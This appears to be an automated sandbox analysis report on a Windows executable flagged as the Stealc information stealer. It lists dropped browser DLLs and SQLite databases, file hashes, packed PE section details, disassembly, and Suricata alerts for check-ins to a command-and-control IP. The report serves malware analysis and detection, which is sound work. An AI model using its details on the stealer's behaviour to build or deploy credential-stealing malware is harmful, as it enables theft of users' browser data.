Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKKKJJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJKKKJJJKJKFHJJJJECBFCGHJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94765955845282
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'824'768 bytes
MD5:	4f821793c9107cc4c9f85967114c424c
SHA1:	5135fe7eeb14db192a16000e6d5b0a30347ea619
SHA256:	0a4ec4fbd55120181c561f1d2fd8f83245241e2d82d9aeb365eb5630ecddab33
SHA512:	b87c1e857533950359013971f7aec7a28e5015e08d8bc6cb8df8017ec21632738fa62c709e028d226a1bc0979b47efdf38d7e7928fd3929757e057d6fd077444
SSDEEP:	49152:u9fRVOPICb0GwV34Re32QHNLoIbUm/Tj4jcnNv:ikwPGE3HmmZ7DN
TLSH:	488533164E9651F6CC18EDB860638B4B36B6CD936DCE23EF698F239AB1745002F7085D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa8d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F3B748B5A9Ah
movzx ebx, byte ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ebx], cl
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+1Eh], ah
adc dword ptr [eax], edx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [esi], bl
adc dword ptr [eax], edx
add byte ptr [eax], al
add byte ptr [eax], al
cdq
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	bc16095499fc14e0b578321215ec8914	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x296000	0x200	59d9b909e437100b84776bbb4a58cc69	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jshjaqtz	0x4f4000	0x198000	0x197600	dc95f31d0fc239ebb8ff3b997126aace	False	0.994920316814974	data	7.952953336791205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lngegkpx	0x68c000	0x1000	0x400	f7dad5d6d1d4fa7503ab8af344573242	False	0.822265625	data	6.382874401630837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x68d000	0x3000	0x2200	5bebb8aaecd71830d87d242b0be7ae18	False	0.0739889705882353	DOS executable (COM)	1.1311510123749764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T18:27:03.282355+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:03.517704+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
2024-09-26T18:27:03.524081+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49730	TCP
2024-09-26T18:27:03.741554+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	185.215.113.37	80	TCP
